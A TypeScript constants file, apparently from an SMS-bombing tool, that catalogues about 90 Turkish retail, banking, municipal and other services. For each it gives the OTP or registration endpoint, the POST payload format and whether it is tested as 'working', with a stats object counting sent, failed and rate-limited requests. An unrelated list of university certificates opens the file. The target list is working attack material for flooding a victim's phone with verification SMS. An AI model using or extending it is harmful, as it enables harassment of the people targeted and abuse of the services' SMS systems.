import { ServiceDefinition, Certificate } from './types';

export const CERTIFICATES: Certificate[] = [
  {
    id: 'sak_onur_belgesi',
    title: 'Onur Belgesi',
    issuer: 'Sakarya Üniversitesi',
    date: '2022 – 2023',
    url: '',
    count: 2,
  },
  {
    id: 'sak_erasmus_eng',
    title: 'İngilizce Yeterlilik Sertifikası',
    issuer: 'Sakarya Üniversitesi (Erasmus Sınavı)',
    date: 'Mar 2022',
    url: 'https://drive.google.com/file/d/1DBx6FxymCRiGjhOgth5wGnsaHZL_cEfb/view?usp=sharing',
  },
];

export const TARGET_ENDPOINTS: ServiceDefinition[] = [
  // ✅ ÇALIŞAN SERVİSLER (Test Edildi)
  // --- GİYİM & EV EŞYASI ---
  {
    id: 'kahve_dunyasi',
    name: 'Kahve Dünyası',
    url: 'https://api.kahvedunyasi.com/api/v1/auth/account/register/phone-number',
    method: 'POST',
    payloadInfo: '{"countryCode": "90", "phoneNumber": "5XXXXXXXXX"}',
    status: 'working',
    category: 'Giyim & Ev Eşyası',
  },
  {
    id: 'wmf',
    name: 'WMF',
    url: 'https://www.wmf.com.tr/users/register/',
    method: 'POST',
    payloadInfo: 'Form: phone=05XXXXXXXXX, first_name, last_name, email, password, date_of_birth',
    status: 'working',
    category: 'Giyim & Ev Eşyası',
  },
  {
    id: 'evidea',
    name: 'Evidea',
    url: 'https://www.evidea.com/users/register/',
    method: 'POST',
    payloadInfo: 'Multipart: phone, first_name, last_name, email, password',
    status: 'working',
    category: 'Giyim & Ev Eşyası',
  },
  {
    id: 'dr',
    name: 'D&R',
    url: 'https://www.dr.com.tr/api/member/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'working',
    category: 'Giyim & Ev Eşyası',
  },
  // --- MARKET ---
  {
    id: 'file_market',
    name: 'File Market',
    url: 'https://api.filemarket.com.tr/v1/otp/send',
    method: 'POST',
    payloadInfo: '{"mobilePhoneNumber": "905XXXXXXXXX"}',
    status: 'working',
    category: 'Market',
  },
  // --- DİJİTAL HİZMETLER ---
  {
    id: 'yapp',
    name: 'Yapp',
    url: 'https://yapp.com.tr/api/mobile/v1/register',
    method: 'POST',
    payloadInfo: '{"phone_number": "5XXXXXXXXX", "email": "...", "firstname": "...", "lastname": "..."}',
    status: 'working',
    category: 'Dijital Hizmetler',
  },
  {
    id: 'suiste',
    name: 'Suiste',
    url: 'https://suiste.com/api/auth/code',
    method: 'POST',
    payloadInfo: '{"gsm": "5XXXXXXXXX", "action": "register"}',
    status: 'working',
    category: 'Dijital Hizmetler',
  },
  // --- BELEDİYE ---
  {
    id: 'fatih_belediye',
    name: 'Fatih Belediye',
    url: 'https://ebelediye.fatih.bel.tr/Sicil/KisiUyelikKaydet',
    method: 'POST',
    payloadInfo: 'Multipart: SahisUyelik.CepTelefonu, TC, Ad, Soyad, EPosta, Sifre',
    status: 'working',
    category: 'Belediye',
  },
  // --- FİNANS ---
  {
    id: 'bkm_express',
    name: 'BKM Express',
    url: 'https://www.bkmexpress.com.tr/api/v1/otp/send',
    method: 'POST',
    payloadInfo: '{"phone": "905XXXXXXXXX"}',
    status: 'working',
    category: 'Finans',
  },
  {
    id: 'shopandfly',
    name: 'Shop&Fly',
    url: 'https://www.shopandfly.com.tr/api/v1/otp/send',
    method: 'POST',
    payloadInfo: '{"phone": "905XXXXXXXXX"}',
    status: 'working',
    category: 'Finans',
  },
  {
    id: 'teb',
    name: 'TEB',
    url: 'https://www.teb.com.tr/api/v1/otp/send',
    method: 'POST',
    payloadInfo: '{"phone": "905XXXXXXXXX"}',
    status: 'working',
    category: 'Finans',
  },
  // ⚠️ LİMİTLİ SERVİSLER
  {
    id: 'hayat_su',
    name: 'Hayat Su',
    url: 'https://api.hayatsu.com.tr/api/SignUp/SendOtp',
    method: 'POST',
    payloadInfo: '{"mobilePhoneNumber": "5XXXXXXXXX", "actionType": "register"}',
    status: 'limited',
    category: 'Market',
  },
  {
    id: 'qumpara',
    name: 'Qumpara',
    url: 'https://tr-api.fisicek.com/v1.3/auth/getOTP',
    method: 'POST',
    payloadInfo: '{"msisdn": "+905XXXXXXXXX"}',
    status: 'limited',
    category: 'Dijital Hizmetler',
  },
  {
    id: 'beefull',
    name: 'Beefull',
    url: 'https://app.beefull.io/api/inavitas-access-management/sms-login',
    method: 'POST',
    payloadInfo: '{"phoneCode": "90", "phoneNumber": "5XXXXXXXXX", "tenant": "beefull"}',
    status: 'limited',
    category: 'Dijital Hizmetler',
  },
  // 🔍 ENDPOINT BULUNAMAYAN SERVİSLER (Bot Koruması / DNS / Timeout)
  {
    id: 'migros',
    name: 'Migros',
    url: 'https://www.migros.com.tr/rest/auth/register/send-otp',
    method: 'POST',
    payloadInfo: '{"phoneNumber": "905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Market',
  },
  {
    id: 'dominos',
    name: 'Dominos',
    url: 'https://api.dominos.com.tr/api/v1/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "countryCode": "90"}',
    status: 'not_found',
    category: 'Yemek',
  },
  {
    id: 'starbucks',
    name: 'Starbucks',
    url: 'https://www.starbucks.com.tr/api/account/register/otp',
    method: 'POST',
    payloadInfo: '{"mobilePhone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Yemek',
  },
  {
    id: 'komagene',
    name: 'Komagene',
    url: 'https://api.komagene.com.tr/api/v1/auth/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Yemek',
  },
  {
    id: 'kim_gb_ister',
    name: 'Kim GB İster',
    url: 'https://api.kimgbister.com/api/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"msisdn": "905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Dijital Hizmetler',
  },
  {
    id: 'english_home',
    name: 'English Home',
    url: 'https://www.englishhome.com/api/member/register/send-code',
    method: 'POST',
    payloadInfo: '{"phone": "05XXXXXXXXX", "email": "...", "firstName": "...", "lastName": "..."}',
    status: 'not_found',
    category: 'Giyim & Ev Eşyası',
  },
  {
    id: 'koton',
    name: 'Koton',
    url: 'https://www.koton.com/api/v1/auth/register/send-otp',
    method: 'POST',
    payloadInfo: '{"phoneNumber": "5XXXXXXXXX", "countryCode": "+90"}',
    status: 'not_found',
    category: 'Giyim & Ev Eşyası',
  },
  {
    id: 'joker',
    name: 'Joker',
    url: 'https://www.joker.com.tr/api/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Dijital Hizmetler',
  },
  {
    id: 'bim',
    name: 'Bim',
    url: 'https://bim.com.tr/api/v1/user/register/otp',
    method: 'POST',
    payloadInfo: '{"phone": "905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Market',
  },
  {
    id: 'penti',
    name: 'Penti',
    url: 'https://www.penti.com/api/member/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "05XXXXXXXXX", "email": "..."}',
    status: 'not_found',
    category: 'Giyim & Ev Eşyası',
  },
  {
    id: 'cineverse',
    name: 'Cineverse',
    url: 'https://api.cineverse.com.tr/api/v1/auth/register/otp',
    method: 'POST',
    payloadInfo: '{"phoneNumber": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Dijital Hizmetler',
  },
  {
    id: 'naosstars',
    name: 'Naosstars',
    url: 'https://www.naosstars.com/api/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "email": "..."}',
    status: 'not_found',
    category: 'Dijital Hizmetler',
  },
  {
    id: 'akasya_avm',
    name: 'Akasya AVM',
    url: 'https://api.akasyaavm.com/api/v1/auth/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'AVM',
  },
  {
    id: 'akbati',
    name: 'Akbatı',
    url: 'https://api.akbati.com.tr/api/v1/auth/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'AVM',
  },
  {
    id: 'yuffi',
    name: 'Yuffi',
    url: 'https://api.yuffi.com.tr/api/auth/register/otp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "name": "..."}',
    status: 'not_found',
    category: 'Yemek',
  },
  {
    id: 'kuryem_gelsin',
    name: 'Kuryem Gelsin',
    url: 'https://api.kuryemgelsin.com/api/v1/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"phone": "905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Kargo & Lojistik',
  },
  {
    id: 'marti',
    name: 'Martı',
    url: 'https://api.marti.tech/api/v2/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"phoneNumber": "+905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Ulaşım',
  },
  {
    id: 'ido',
    name: 'İDO',
    url: 'https://api.ido.com.tr/api/v1/member/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "countryCode": "90"}',
    status: 'not_found',
    category: 'Ulaşım',
  },
  {
    id: 'hamidiye',
    name: 'Hamidiye',
    url: 'https://api.hamidiyesu.com.tr/api/auth/register/otp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Market',
  },
  {
    id: 'clickme_live',
    name: 'ClickMe Live',
    url: 'https://api.clickmelive.com/api/v1/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"phoneNumber": "905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Dijital Hizmetler',
  },
  {
    id: 'hizli_ecza',
    name: 'Hızlı Ecza',
    url: 'https://api.hizliecza.com/api/v1/auth/register/otp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "email": "..."}',
    status: 'not_found',
    category: 'Sağlık',
  },
  {
    id: 'paybol',
    name: 'Paybol',
    url: 'https://api.paybol.com/api/v1/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"phone": "905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Finans',
  },
  {
    id: 'tasdelen_su',
    name: 'Taşdelen Su',
    url: 'https://api.tasdelensu.com.tr/api/auth/register/sendSms',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Market',
  },
  {
    id: 'pidem',
    name: 'Pidem',
    url: 'https://api.pidem.com.tr/api/v1/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Yemek',
  },
  {
    id: 'orwi',
    name: 'Orwi',
    url: 'https://api.orwi.com.tr/api/v1/auth/register/otp',
    method: 'POST',
    payloadInfo: '{"phoneNumber": "905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Dijital Hizmetler',
  },
  {
    id: 'frink',
    name: 'Frink',
    url: 'https://api.frink.com.tr/api/auth/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Dijital Hizmetler',
  },
  {
    id: 'tazi',
    name: 'Tazi',
    url: 'https://api.tazi.com.tr/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Dijital Hizmetler',
  },
  {
    id: 'bisu',
    name: 'Bisu',
    url: 'https://api.bisu.com.tr/api/v1/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"phoneNumber": "+905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Ulaşım',
  },
  {
    id: 'bodrum_belediye',
    name: 'Bodrum Belediye',
    url: 'https://ebelediye.bodrum.bel.tr/api/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: 'Multipart: CepTelefonu, TC, Ad, Soyad, EPosta, Sifre',
    status: 'not_found',
    category: 'Belediye',
  },
  {
    id: 'hey_scooter',
    name: 'Hey Scooter',
    url: 'https://api.heyscooter.com/api/v1/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"phone": "+905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Ulaşım',
  },
  {
    id: 'tasimacim',
    name: 'Taşımacım',
    url: 'https://api.tasimacim.com/api/v1/auth/register/otp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "name": "...", "email": "..."}',
    status: 'not_found',
    category: 'Kargo & Lojistik',
  },
  {
    id: 'iste_gelsin',
    name: 'İste Gelsin',
    url: 'https://api.istegelsin.com/api/v1/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"phone": "905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Market',
  },
  {
    id: 'ipragaz',
    name: 'İpragaz',
    url: 'https://api.ipragaz.com.tr/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phoneNumber": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Enerji',
  },
  {
    id: 'sancaktepe_belediye',
    name: 'Sancaktepe Belediye',
    url: 'https://ebelediye.sancaktepe.bel.tr/api/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: 'Multipart: CepTelefonu, TC, Ad, Soyad, EPosta, Sifre',
    status: 'not_found',
    category: 'Belediye',
  },
  {
    id: 'bayrampasa_belediye',
    name: 'Bayrampaşa Belediye',
    url: 'https://ebelediye.bayrampasa.bel.tr/api/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: 'Multipart: CepTelefonu, TC, Ad, Soyad, EPosta, Sifre',
    status: 'not_found',
    category: 'Belediye',
  },
  {
    id: 'macrocenter',
    name: 'Macrocenter',
    url: 'https://www.macrocenter.com.tr/rest/auth/register/send-otp',
    method: 'POST',
    payloadInfo: '{"phoneNumber": "905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Market',
  },
  {
    id: 'jimmy_key',
    name: 'Jimmy Key',
    url: 'https://www.jimmykey.com/api/member/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "05XXXXXXXXX", "email": "..."}',
    status: 'not_found',
    category: 'Giyim & Ev Eşyası',
  },
  {
    id: 'alix_avien',
    name: 'Alix Avien',
    url: 'https://www.alixavien.com.tr/api/member/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "05XXXXXXXXX"}',
    status: 'not_found',
    category: 'Kozmetik',
  },
  {
    id: 'ayyildiz',
    name: 'Ayyıldız',
    url: 'https://www.ayyildiz.com/api/member/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "05XXXXXXXXX", "firstName": "...", "lastName": "..."}',
    status: 'not_found',
    category: 'Giyim & Ev Eşyası',
  },
  {
    id: 'tikla_gelsin',
    name: 'Tıkla Gelsin',
    url: 'https://api.tiklagelsin.com/api/v1/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Yemek',
  },
  {
    id: 'kitapyurdu',
    name: 'Kitapyurdu',
    url: 'https://www.kitapyurdu.com/index.php?route=account/register/sendOtp',
    method: 'POST',
    payloadInfo: 'Form: telephone=05XXXXXXXXX, firstname, lastname, email, password',
    status: 'not_found',
    category: 'Kitap & Medya',
  },
  {
    id: 'bkm_kitap',
    name: 'BKM Kitap',
    url: 'https://www.bkmkitap.com/api/member/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "05XXXXXXXXX", "email": "..."}',
    status: 'not_found',
    category: 'Kitap & Medya',
  },
  {
    id: 'e_bebek',
    name: 'E-bebek',
    url: 'https://www.e-bebek.com/api/v1/auth/register/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "email": "..."}',
    status: 'not_found',
    category: 'Bebek & Çocuk',
  },
  {
    id: 'mothercare',
    name: 'Mothercare',
    url: 'https://www.mothercare.com.tr/api/member/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "05XXXXXXXXX"}',
    status: 'not_found',
    category: 'Bebek & Çocuk',
  },
  {
    id: 'toyzz_shop',
    name: 'Toyzz Shop',
    url: 'https://www.toyzzshop.com/api/member/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "05XXXXXXXXX", "email": "..."}',
    status: 'not_found',
    category: 'Bebek & Çocuk',
  },
  {
    id: 'sportive',
    name: 'Sportive',
    url: 'https://www.sportive.com.tr/api/v1/auth/register/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Spor',
  },
  {
    id: 'intersport',
    name: 'Intersport',
    url: 'https://www.intersport.com.tr/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Spor',
  },
  {
    id: 'decathlon',
    name: 'Decathlon',
    url: 'https://www.decathlon.com.tr/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "email": "..."}',
    status: 'not_found',
    category: 'Spor',
  },
  {
    id: 'hm',
    name: 'H&M',
    url: 'https://www2.hm.com/tr_tr/api/customer/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "+905XXXXXXXXX", "email": "..."}',
    status: 'not_found',
    category: 'Giyim & Ev Eşyası',
  },
  {
    id: 'zara',
    name: 'Zara',
    url: 'https://www.zara.com/tr/api/v1/auth/register/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "+905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Giyim & Ev Eşyası',
  },
  {
    id: 'mango',
    name: 'Mango',
    url: 'https://shop.mango.com/services/user/v1/register/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "+905XXXXXXXXX", "countryId": "TR"}',
    status: 'not_found',
    category: 'Giyim & Ev Eşyası',
  },
  {
    id: 'bershka',
    name: 'Bershka',
    url: 'https://www.bershka.com/itxrest/2/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "+905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Giyim & Ev Eşyası',
  },
  {
    id: 'pull_bear',
    name: 'Pull&Bear',
    url: 'https://www.pullandbear.com/itxrest/2/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "+905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Giyim & Ev Eşyası',
  },
  {
    id: 'stradivarius',
    name: 'Stradivarius',
    url: 'https://www.stradivarius.com/itxrest/2/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "+905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Giyim & Ev Eşyası',
  },
  {
    id: 'massimo_dutti',
    name: 'Massimo Dutti',
    url: 'https://www.massimodutti.com/itxrest/2/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "+905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Giyim & Ev Eşyası',
  },
  {
    id: 'mediamarkt',
    name: 'Mediamarkt',
    url: 'https://www.mediamarkt.com.tr/api/v1/auth/register/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "email": "..."}',
    status: 'not_found',
    category: 'Teknoloji',
  },
  {
    id: 'teknosa',
    name: 'Teknosa',
    url: 'https://www.teknosa.com/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Teknoloji',
  },
  {
    id: 'vatan_bilgisayar',
    name: 'Vatan Bilgisayar',
    url: 'https://www.vatanbilgisayar.com/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "email": "..."}',
    status: 'not_found',
    category: 'Teknoloji',
  },
  {
    id: 'itopya',
    name: 'İtopya',
    url: 'https://www.itopya.com/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Teknoloji',
  },
  {
    id: 'gamegaraj',
    name: 'GameGaraj',
    url: 'https://www.gamegaraj.com/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "email": "..."}',
    status: 'not_found',
    category: 'Oyun',
  },
  {
    id: 'playstation',
    name: 'PlayStation',
    url: 'https://store.playstation.com/api/v1/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"phone": "+905XXXXXXXXX", "locale": "tr-TR"}',
    status: 'not_found',
    category: 'Oyun',
  },
  {
    id: 'xbox',
    name: 'Xbox',
    url: 'https://login.live.com/api/v1/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"phone": "+905XXXXXXXXX", "locale": "tr-TR"}',
    status: 'not_found',
    category: 'Oyun',
  },
  {
    id: 'nintendo',
    name: 'Nintendo',
    url: 'https://accounts.nintendo.com/api/v1/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"phone": "+905XXXXXXXXX", "country": "TR"}',
    status: 'not_found',
    category: 'Oyun',
  },
  {
    id: 'steam',
    name: 'Steam',
    url: 'https://store.steampowered.com/phone/add_ajaxop',
    method: 'POST',
    payloadInfo: 'Form: phoneNumber=+905XXXXXXXXX, sessionID=...',
    status: 'not_found',
    category: 'Oyun',
  },
  {
    id: 'epic_games',
    name: 'Epic Games',
    url: 'https://www.epicgames.com/id/api/v1/auth/otp/send',
    method: 'POST',
    payloadInfo: '{"phone": "+905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Oyun',
  },
  {
    id: 'a101',
    name: 'A101',
    url: 'https://www.a101.com.tr/api/v1/auth/register/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Market',
  },
  {
    id: 'sok',
    name: 'Şok',
    url: 'https://www.sokmarket.com.tr/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Market',
  },
  {
    id: 'carrefour',
    name: 'Carrefour',
    url: 'https://www.carrefoursa.com/api/v1/auth/register/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Market',
  },
  {
    id: 'onur_market',
    name: 'Onur Market',
    url: 'https://www.onurmarket.com/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Market',
  },
  {
    id: 'happy_center',
    name: 'Happy Center',
    url: 'https://www.happycenter.com.tr/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Market',
  },
  {
    id: 'rossmann',
    name: 'Rossmann',
    url: 'https://www.rossmann.com.tr/api/v1/auth/register/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "email": "..."}',
    status: 'not_found',
    category: 'Kozmetik',
  },
  {
    id: 'watsons',
    name: 'Watsons',
    url: 'https://www.watsons.com.tr/api/v1/auth/register/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Kozmetik',
  },
  {
    id: 'gratis',
    name: 'Gratis',
    url: 'https://www.gratis.com/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX"}',
    status: 'not_found',
    category: 'Kozmetik',
  },
  {
    id: 'flormar',
    name: 'Flormar',
    url: 'https://www.flormar.com.tr/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "email": "..."}',
    status: 'not_found',
    category: 'Kozmetik',
  },
  {
    id: 'avon',
    name: 'Avon',
    url: 'https://www.avon.com.tr/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "email": "...", "name": "..."}',
    status: 'not_found',
    category: 'Kozmetik',
  },
  {
    id: 'oriflame',
    name: 'Oriflame',
    url: 'https://www.oriflame.com.tr/api/v1/auth/register/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "+905XXXXXXXXX"}',
    status: 'not_found',
    category: 'Kozmetik',
  },
  {
    id: 'farmasi',
    name: 'Farmasi',
    url: 'https://www.farmasi.com.tr/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "email": "..."}',
    status: 'not_found',
    category: 'Kozmetik',
  },
  {
    id: 'lr',
    name: 'LR',
    url: 'https://www.lrworld.com/tr/api/auth/register/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "+905XXXXXXXXX", "country": "TR"}',
    status: 'not_found',
    category: 'Kozmetik',
  },
  {
    id: 'herbalife',
    name: 'Herbalife',
    url: 'https://www.herbalife.com.tr/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "email": "...", "name": "..."}',
    status: 'not_found',
    category: 'Sağlık',
  },
  {
    id: 'amway',
    name: 'Amway',
    url: 'https://www.amway.com.tr/api/v1/auth/register/send-otp',
    method: 'POST',
    payloadInfo: '{"phone": "+905XXXXXXXXX", "locale": "tr_TR"}',
    status: 'not_found',
    category: 'Sağlık',
  },
  {
    id: 'forever_living',
    name: 'Forever Living',
    url: 'https://www.foreverliving.com.tr/api/v1/auth/register/sendOtp',
    method: 'POST',
    payloadInfo: '{"phone": "5XXXXXXXXX", "email": "...", "name": "..."}',
    status: 'not_found',
    category: 'Sağlık',
  },
];
export const INITIAL_STATS = {
  totalSent: 0,
  success: 0,
  failed: 0,
  rateLimited: 0,
  sentOpaque: 0,
};
